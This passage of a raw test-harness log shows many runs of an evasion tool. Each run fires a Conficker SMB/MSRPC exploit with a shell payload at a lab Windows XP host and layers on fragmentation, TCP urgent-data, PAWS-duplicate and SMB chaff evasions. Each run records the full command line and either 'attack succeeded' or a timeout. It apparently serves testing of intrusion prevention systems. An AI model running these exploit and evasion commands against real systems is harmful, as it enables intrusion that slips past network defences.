  4892. 8385 runs averaging 1.94 runs / second ; progress: 4329/43200.....
  4893. 8390 runs averaging 1.94 runs / second ; progress: 4334/43200.
  4894. 8391 runs averaging 1.93 runs / second ; progress: 4339/43200.......
  4895. 8398 runs averaging 1.93 runs / second ; progress: 4344/43200............
  4896. 8410 runs averaging 1.93 runs / second ; progress: 4349/43200..........Pid 2268 timed out - killed
  4897. 2015-06-08 00:32:02 INFO
  4898. Timed out (10.62.90.117):
  4899. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55553 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=kxyX01oYSMk --evasion=[smb_opentree,end]smb_chaff,"13","write_flag","alphanum" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  4900. Info: Using random seed kxyX01oYSMm
  4901. The following evasions are applied from stage smb_connect to msrpc_bind:
  4902. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  4903. The following evasions are applied from stage smb_opentree to end:
  4904. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  4905.  
  4906. Info: NetBIOS connection 10.62.90.117:55553 -> 10.35.1.207:445
  4907. Terminated
  4908. 2015-06-08 00:32:02 INFO
  4909. Success. (10.62.90.110):
  4910. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53177 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sooPHhEIT8g --evasion=[smb_connect,end]ipv4_frag,"104" --evasion=[smb_opentree,end]smb_decoytrees,"5","2","3","random_msrpcreq" --verifydelay=1000 --payload=shell
  4911. Info: Using random seed sooPHhEIT8i
  4912. The following evasions are applied from stage smb_connect to end:
  4913. - IPv4 fragments with at most 104 bytes per fragment
  4914. The following evasions are applied from stage smb_opentree to end:
  4915. - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  4916.  
  4917. Info: NetBIOS connection 10.62.90.110:53177 -> 10.35.1.207:445
  4918. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4919. Info: Sending MSRPC request with exploit
  4920. Info: Shell found, attack succeeded
  4921. Info: Shell closed
  4922. 0: Success.
  4923. ....
  4924. 8426 runs averaging 1.94 runs / second ; progress: 4354/43200.........
  4925. 8435 runs averaging 1.94 runs / second ; progress: 4359/43200.........
  4926. 8444 runs averaging 1.93 runs / second ; progress: 4364/43200....Pid 2527 timed out - killed
  4927. 2015-06-08 00:32:18 INFO
  4928. Timed out (10.62.90.119):
  4929. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60882 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=T6XfWoQScYo --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4930. Info: Using random seed T6XfWoQScYp
  4931. The following evasions are applied from stage smb_opentree to end:
  4932. - Add a zero urgent data byte to every 2 TCP segment.
  4933. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4934. - MSRPC NDR flag is modified:
  4935. * Unspecified character encoding
  4936. * Cray floating point value encoding
  4937. * Reserved 3rd byte is set to a random non-zero value
  4938. * Reserved 4th byte is set to a random non-zero value
  4939.  
  4940.  
  4941. Info: NetBIOS connection 10.62.90.119:60882 -> 10.35.1.207:445
  4942. Terminated
  4943. ..
  4944. 8451 runs averaging 1.93 runs / second ; progress: 4369/43200...............
  4945. 8466 runs averaging 1.94 runs / second ; progress: 4374/43200......
  4946. 8472 runs averaging 1.93 runs / second ; progress: 4379/43200
  4947. 8472 runs averaging 1.93 runs / second ; progress: 4384/43200...
  4948. 8475 runs averaging 1.93 runs / second ; progress: 4389/43200..........
  4949. 8485 runs averaging 1.93 runs / second ; progress: 4394/43200.....
  4950. 8490 runs averaging 1.93 runs / second ; progress: 4399/43200.......
  4951. 8497 runs averaging 1.93 runs / second ; progress: 4404/43200
  4952. 8497 runs averaging 1.93 runs / second ; progress: 4409/43200....
  4953. 8501 runs averaging 1.93 runs / second ; progress: 4414/43200........2015-06-08 00:33:08 INFO
  4954. Success. (10.62.90.118):
  4955. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59785 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=qI+MyxnbeGg --evasion=[start,msrpc_bind]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","5","random_alphanum" --verifydelay=1000 --payload=shell
  4956. Info: Using random seed qI+MyxnbeGi
  4957. The following evasions are applied from stage start to msrpc_bind:
  4958. - IPv4 fragments with at most 1464 bytes per fragment
  4959. The following evasions are applied from stage netbios_connect to msrpc_req:
  4960. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
  4961.  
  4962. Info: NetBIOS connection 10.62.90.118:59785 -> 10.35.1.207:445
  4963. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4964. Info: Sending MSRPC request with exploit
  4965. Info: Shell found, attack succeeded
  4966. Info: Shell closed
  4967. 0: Success.
  4968. ..
  4969. 8512 runs averaging 1.93 runs / second ; progress: 4419/43200.....2015-06-08 00:33:12 INFO
  4970. Success. (10.62.90.118):
  4971. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15707 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=i/S3e+bhers --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_null_trailer" --evasion=[msrpc_req,end]tcp_paws,"50%","196394028","shuffle" --verifydelay=1000 --payload=shell
  4972. Info: Using random seed i/S3e+bheru
  4973. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4974. - The SMB filename is obfuscated:
  4975. * Random characters case is changed
  4976. * A 0x00 and random alphanumeric characters are appended to the filename
  4977. The following evasions are applied from stage msrpc_req to end:
  4978. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 196394028> and has shuffled original payload
  4979.  
  4980. Info: NetBIOS connection 10.62.90.118:15707 -> 10.35.1.207:445
  4981. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4982. Info: Sending MSRPC request with exploit
  4983. Info: Shell found, attack succeeded
  4984. Info: Shell closed
  4985. 0: Success.
  4986. ..
  4987. 8520 runs averaging 1.93 runs / second ; progress: 4424/43200......
  4988. 8526 runs averaging 1.92 runs / second ; progress: 4429/43200....
  4989. 8530 runs averaging 1.92 runs / second ; progress: 4434/43200.....
  4990. 8535 runs averaging 1.92 runs / second ; progress: 4439/43200....2015-06-08 00:33:33 INFO
  4991. Success. (10.62.90.118):
  4992. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10990 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=KwjnkM1JXmw --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"7","7","8","random_msrpcbind" --evasion=[msrpc_req,end]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","161608787","alpharandomized" --verifydelay=1000 --payload=shell
  4993. Info: Using random seed KwjnkM1JXmw
  4994. The following evasions are applied from stage smb_connect to smb_openpipe:
  4995. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  4996. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4997. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161608787> and has original payload with alphabetic bytes randomized
  4998. The following evasions are applied from stage msrpc_req to end:
  4999. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5000. * Invalid TCP checksum.
  5001. * NULL TCP checksum.
  5002. * NULL TCP control flags.
  5003. * TCP header shorter than 20 bytes
  5004. * TCP header longer than packet total size
  5005. * Duplicate packet has 0x00 bytes as payload
  5006.  
  5007. Info: NetBIOS connection 10.62.90.118:10990 -> 10.35.1.207:445
  5008. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5009. Info: Sending MSRPC request with exploit
  5010. Info: Shell found, attack succeeded
  5011. Info: CommandShell::SendCommand() - Failed to send string
  5012. Info: Command shell connection reset.
  5013. Info: Shell closed
  5014. 0: Success.
  5015. .
  5016. 8541 runs averaging 1.92 runs / second ; progress: 4444/43200.....
  5017. 8546 runs averaging 1.92 runs / second ; progress: 4449/43200.......
  5018. 8553 runs averaging 1.92 runs / second ; progress: 4454/43200..Pid 4069 timed out - killed
  5019. 2015-06-08 00:33:46 INFO
  5020. Timed out (10.62.90.111):
  5021. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45678 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=nv0/I9X2yH0 --evasion=[start,smb_openpipe]ipv4_frag,"1264" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  5022. Info: Using random seed nv0/I9X2yH2
  5023. The following evasions are applied from stage start to smb_openpipe:
  5024. - IPv4 fragments with at most 1264 bytes per fragment
  5025. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5026. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  5027.  
  5028. Info: NetBIOS connection 10.62.90.111:45678 -> 10.35.1.207:445
  5029. Terminated
  5030. ...
  5031. 8559 runs averaging 1.92 runs / second ; progress: 4459/43200
  5032. 8559 runs averaging 1.92 runs / second ; progress: 4464/43200..
  5033. 8561 runs averaging 1.92 runs / second ; progress: 4469/43200Pid 4398 timed out - killed
  5034. 2015-06-08 00:34:00 INFO
  5035. Timed out (10.62.90.115):
  5036. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60638 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=20s+1xE/E2Q --evasion=[msrpc_req,end]netbios_chaff,"1","empty_keepalive|http_post|msrpc_req" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  5037. Info: Using random seed 20s+1xE/E2T
  5038. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5039. - 75% probability to add a zero urgent data byte to a TCP segment.
  5040. The following evasions are applied from stage msrpc_req to end:
  5041. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  5042.  
  5043. Info: NetBIOS connection 10.62.90.115:60638 -> 10.35.1.207:445
  5044. Terminated
  5045. ...........
  5046. 8573 runs averaging 1.92 runs / second ; progress: 4475/432002015-06-08 00:34:05 INFO
  5047. Success. (10.62.90.111):
  5048. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22375 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=XYxpSCVMOvI --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"509","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","43065069","shuffle" --verifydelay=1000 --payload=shell
  5049. Info: Using random seed XYxpSCVMOvJ
  5050. The following evasions are applied from stage smb_connect to msrpc_bind:
  5051. - 509 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  5052. The following evasions are applied from stage smb_opentree to msrpc_req:
  5053. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43065069> and has shuffled original payload
  5054.  
  5055. Info: NetBIOS connection 10.62.90.111:22375 -> 10.35.1.207:445
  5056. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5057. Info: Sending MSRPC request with exploit
  5058. Info: Shell found, attack succeeded
  5059. Info: Shell closed
  5060. 0: Success.
  5061. ...........
  5062. 8585 runs averaging 1.92 runs / second ; progress: 4480/43200............
  5063. 8597 runs averaging 1.92 runs / second ; progress: 4485/43200..............
  5064. 8611 runs averaging 1.92 runs / second ; progress: 4490/43200..............
  5065. 8625 runs averaging 1.92 runs / second ; progress: 4495/43200...........
  5066. 8636 runs averaging 1.92 runs / second ; progress: 4500/43200.Pid 4839 timed out - killed
  5067. 2015-06-08 00:34:31 INFO
  5068. Timed out (10.62.90.113):
  5069. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b9XU0yKQnxs --evasion=[start,netbios_connect]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  5070. Info: Using random seed b9XU0yKQnxt
  5071. The following evasions are applied from stage start to netbios_connect:
  5072. - IPv4 fragments with at most 48 bytes per fragment
  5073. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5074. - 75% probability to add a random urgent data byte to a TCP segment.
  5075.  
  5076. Info: NetBIOS connection 10.62.90.113:22602 -> 10.35.1.207:445
  5077. Terminated
  5078. .........
  5079. 8647 runs averaging 1.92 runs / second ; progress: 4505/43200............2015-06-08 00:34:38 INFO
  5080. Success. (10.62.90.111):
  5081. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25522 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F5bVtHv8w7c --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"change_case" --evasion=[start,end]tcp_paws,"3","126118068","random_alphanum" --verifydelay=1000 --payload=shell
  5082. Info: Using random seed F5bVtHv8w7c
  5083. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 126118068> and has random alphanumeric bytes as payload
  5084. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5085. - The SMB filename is obfuscated:
  5086. * Random characters case is changed
  5087.  
  5088. Info: NetBIOS connection 10.62.90.111:25522 -> 10.35.1.207:445
  5089. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5090. Info: Sending MSRPC request with exploit
  5091. Info: Shell found, attack succeeded
  5092. Info: CommandShell::SendCommand() - Failed to send string
  5093. Info: Command shell connection reset.
  5094. Info: Shell closed
  5095. 0: Success.
  5096. ....
  5097. 8664 runs averaging 1.92 runs / second ; progress: 4510/43200..........
  5098. 8674 runs averaging 1.92 runs / second ; progress: 4515/43200.......
  5099. 8681 runs averaging 1.92 runs / second ; progress: 4520/43200.........
  5100. 8690 runs averaging 1.92 runs / second ; progress: 4525/43200.............
  5101. 8703 runs averaging 1.92 runs / second ; progress: 4530/43200...........
  5102. 8714 runs averaging 1.92 runs / second ; progress: 4535/43200..........
  5103. 8724 runs averaging 1.92 runs / second ; progress: 4540/43200..........
  5104. 8734 runs averaging 1.92 runs / second ; progress: 4545/43200.......2015-06-08 00:35:18 INFO
  5105. Success. (10.62.90.118):
  5106. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42635 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=TuoN/Fks6dA --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"24" --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[msrpc_bind,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  5107. Info: Using random seed TuoN/Fks6dB
  5108. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5109. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5110. The duplicate packet has identical payload except that alphanumeric characters are randomized
  5111. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5112. - IPv4 fragments with at most 24 bytes per fragment
  5113. The following evasions are applied from stage msrpc_bind to end:
  5114. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  5115.  
  5116. Info: NetBIOS connection 10.62.90.118:42635 -> 10.35.1.207:445
  5117. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5118. Info: Sending MSRPC request with exploit
  5119. Info: Shell found, attack succeeded
  5120. Info: Shell closed
  5121. 0: Success.
  5122. .......
  5123. 8749 runs averaging 1.92 runs / second ; progress: 4550/43200.............
  5124. 8762 runs averaging 1.92 runs / second ; progress: 4555/43200...........2015-06-08 00:35:28 INFO
  5125. Success. (10.62.90.119):
  5126. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36182 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HBD+cGWNJlg --evasion=[netbios_connect,end]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","51055844","random_alphanum" --verifydelay=1000 --payload=shell
  5127. Info: Using random seed HBD+cGWNJlg
  5128. The following evasions are applied from stage netbios_connect to end:
  5129. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5130. The duplicate packet has NULL bytes for payload
  5131. The following evasions are applied from stage msrpc_bind to end:
  5132. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 51055844> and has random alphanumeric bytes as payload
  5133.  
  5134. Info: NetBIOS connection 10.62.90.119:36182 -> 10.35.1.207:445
  5135. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5136. Info: Sending MSRPC request with exploit
  5137. Info: Shell found, attack succeeded
  5138. Info: Shell closed
  5139. 0: Success.
  5140. ........
  5141. 8782 runs averaging 1.93 runs / second ; progress: 4560/43200
  5142. 8782 runs averaging 1.92 runs / second ; progress: 4565/43200..2015-06-08 00:35:37 INFO
  5143. Success. (10.62.90.111):
  5144. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35443 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=PMOGjF6h7ww --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","8","random" --verifydelay=1000 --payload=shell
  5145. Info: Using random seed PMOGjF6h7ww
  5146. The following evasions are applied from stage smb_connect to smb_openpipe:
  5147. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5148. The following evasions are applied from stage smb_opentree to end:
  5149. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  5150.  
  5151. Info: NetBIOS connection 10.62.90.111:35443 -> 10.35.1.207:445
  5152. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5153. Info: Sending MSRPC request with exploit
  5154. Info: Shell found, attack succeeded
  5155. Info: Shell closed
  5156. 0: Success.
  5157. ......
  5158. 8791 runs averaging 1.92 runs / second ; progress: 4570/43200............
  5159. 8803 runs averaging 1.92 runs / second ; progress: 4575/43200..................
  5160. 8821 runs averaging 1.93 runs / second ; progress: 4580/43200............
  5161. 8833 runs averaging 1.93 runs / second ; progress: 4585/43200.......
  5162. 8840 runs averaging 1.93 runs / second ; progress: 4590/43200......
  5163. 8846 runs averaging 1.92 runs / second ; progress: 4595/43200....
  5164. 8850 runs averaging 1.92 runs / second ; progress: 4600/43200.........
  5165. 8859 runs averaging 1.92 runs / second ; progress: 4605/43200.............
  5166. 8872 runs averaging 1.92 runs / second ; progress: 4611/43200...2015-06-08 00:36:21 INFO
  5167. Success. (10.62.90.118):
  5168. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35389 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=T0PbYlV/b4Y --evasion=[smb_openpipe,end]smb_fnameobf,"add_paths" --evasion=[msrpc_req,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
  5169. Info: Using random seed T0PbYlV/b4Z
  5170. The following evasions are applied from stage smb_openpipe to end:
  5171. - The SMB filename is obfuscated:
  5172. * Dummy paths are added ( a/b -> a/c/../b )
  5173. The following evasions are applied from stage msrpc_req to end:
  5174. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  5175.  
  5176. Info: NetBIOS connection 10.62.90.118:35389 -> 10.35.1.207:445
  5177. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5178. Info: Sending MSRPC request with exploit
  5179. Info: Shell found, attack succeeded
  5180. Info: Shell closed
  5181. 0: Success.
  5182. ....Pid 6902 timed out - killed
  5183. 2015-06-08 00:36:24 INFO
  5184. Timed out (10.62.90.114):
  5185. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52459 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4c8g/DIFW7I --evasion=[smb_openpipe,msrpc_req]smb_chaff,"13","write_flag","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  5186. Info: Using random seed 4c8g/DIFW7L
  5187. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5188. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  5189. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5190. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  5191.  
  5192. Info: NetBIOS connection 10.62.90.114:52459 -> 10.35.1.207:445
  5193. Terminated
  5194. ..
  5195. 8883 runs averaging 1.92 runs / second ; progress: 4616/43200......
  5196. 8889 runs averaging 1.92 runs / second ; progress: 4621/43200....
  5197. 8893 runs averaging 1.92 runs / second ; progress: 4626/43200.........
  5198. 8902 runs averaging 1.92 runs / second ; progress: 4631/43200
  5199. 8902 runs averaging 1.92 runs / second ; progress: 4636/43200
  5200. 8902 runs averaging 1.92 runs / second ; progress: 4641/43200......
  5201. 8908 runs averaging 1.92 runs / second ; progress: 4646/43200.........
  5202. 8917 runs averaging 1.92 runs / second ; progress: 4651/43200.......
  5203. 8924 runs averaging 1.92 runs / second ; progress: 4656/43200..
  5204. 8926 runs averaging 1.92 runs / second ; progress: 4661/43200.
  5205. 8927 runs averaging 1.91 runs / second ; progress: 4666/43200.Pid 7659 timed out - killed
  5206. 2015-06-08 00:37:18 INFO
  5207. Timed out (10.62.90.117):
  5208. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48863 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=iOiNE51qbIE --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"8","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  5209. Info: Using random seed iOiNE51qbIG
  5210. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5211. - Add a random alphanumeric urgent data byte to every 8 TCP segment.
  5212. The following evasions are applied from stage smb_openpipe to end:
  5213. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  5214.  
  5215. Info: NetBIOS connection 10.62.90.117:48863 -> 10.35.1.207:445
  5216. Terminated
  5217. .....
  5218. 8934 runs averaging 1.91 runs / second ; progress: 4671/43200..Pid 7806 timed out - killed
  5219. 2015-06-08 00:37:22 INFO
  5220. Timed out (10.62.90.116):
  5221. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52933 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Iv5+sA53FSw --evasion=[smb_opentree,smb_openpipe]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  5222. Info: Using random seed Iv5+sA53FSw
  5223. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5224. - 25% probability to add a zero urgent data byte to a TCP segment.
  5225. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5226. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5227.  
  5228. Info: NetBIOS connection 10.62.90.116:52933 -> 10.35.1.207:445
  5229. Terminated
  5230. .....Pid 7870 timed out - killed
  5231. 2015-06-08 00:37:25 INFO
  5232. Timed out (10.62.90.110):
  5233. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25618 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sgNECLIvgpo --evasion=[smb_connect,end]tcp_chaff,"8","nullchksum|nullflag|shorthdr","shuffle" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  5234. Info: Using random seed sgNECLIvgpq
  5235. The following evasions are applied from stage smb_connect to end:
  5236. - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5237. * NULL TCP checksum.
  5238. * NULL TCP control flags.
  5239. * TCP header shorter than 20 bytes
  5240. * Duplicate packet has shuffled original payload
  5241. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5242. - Add a zero urgent data byte to every 3 TCP segment.
  5243. The following evasions are applied from stage smb_openpipe to end:
  5244. - 75% probability to add a random urgent data byte to a TCP segment.
  5245.  
  5246. Info: NetBIOS connection 10.62.90.110:25618 -> 10.35.1.207:445
  5247. Terminated
  5248.  
  5249. 8943 runs averaging 1.91 runs / second ; progress: 4676/43200...................
  5250. 8962 runs averaging 1.91 runs / second ; progress: 4681/43200.........2015-06-08 00:37:33 INFO
  5251. Success. (10.62.90.113):
  5252. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57107 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=2vlqNASig6Q --evasion=[smb_openpipe,end]smb_decoytrees,"4","2","3","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_chaff,"21","nullchksum|nullflag|outofwindow|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
  5253. Info: Using random seed 2vlqNASig6T
  5254. The following evasions are applied from stage smb_openpipe to end:
  5255.  
  5256. - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  5257.  
  5258. Info: NetBIOS connection 10.62.90.113:57107 -> 10.35.1.207:445
  5259. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5260. Info: Sending MSRPC request with exploit
  5261. Info: Shell found, attack succeeded
  5262. Info: Shell closed
  5263. 0: Success.
  5264. .......2015-06-08 00:37:35 INFO
  5265. Success. (10.62.90.115):
  5266. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17874 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=TcBcODpf5zs --evasion=[msrpc_req,end]tcp_paws,"1","7","zero" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5267. Info: Using random seed TcBcODpf5zt
  5268. The following evasions are applied from stage netbios_connect to msrpc_req:
  5269. - TCP timestamps echo reply value is sent in the wrong endianness
  5270. The following evasions are applied from stage msrpc_req to end:
  5271. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has 0x00 bytes as payload
  5272.  
  5273. Info: NetBIOS connection 10.62.90.115:17874 -> 10.35.1.207:445
